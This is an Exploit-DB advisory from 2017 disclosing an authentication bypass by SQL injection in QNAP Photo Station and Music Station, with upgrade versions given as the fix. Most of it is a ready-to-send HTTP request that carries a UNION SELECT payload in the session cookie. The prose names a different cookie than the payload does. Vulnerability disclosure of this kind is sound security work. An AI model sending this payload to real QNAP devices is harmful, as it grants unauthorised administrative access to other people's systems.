EDB-ID: 41988 | Author: Kacper Szurek | Published: 2017-05-10 | CVE: N/A | Type: Webapps | Platform: PHP | Aliases: N/A | Advisory/Source: N/A | Tags: Credentials Bypass aka Admin Bypass AKA Auth Bypass (AB/CB) | Vulnerable App: N/A | # Date: 10.05.2017
# Software Link: https://www.qnap.com
# Exploit Author: Kacper Szurek
# Contact: https://twitter.com/KacperSzurek
# Website: https://security.szurek.pl/
# Category: web
1. Description
`$_COOKIE[STATIONSID]` is not escaped and then used inside SQL statement.
https://security.szurek.pl/qnap-photostation-524-musicstation-484-authentication-bypass.html
2. Proof of Concept
GET /photo/api/dmc.php HTTP/1.1
Host: qnap.host:8080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, sdch
Accept-Language: pl-PL,pl;q=0.8,en-US;q=0.6,en;q=0.4
Cookie: QMS_SID=' UNION SELECT 9999999999,9999999999,9999999999,9999999999,9999999999,9999999999,9999999999,9999999999,9999999999 -- a
Connection: close
3. Fix
Upgrade to version: Photo Station (5.3.4 / 5.2.5), Music Station (5.0.4 / 4.8.5)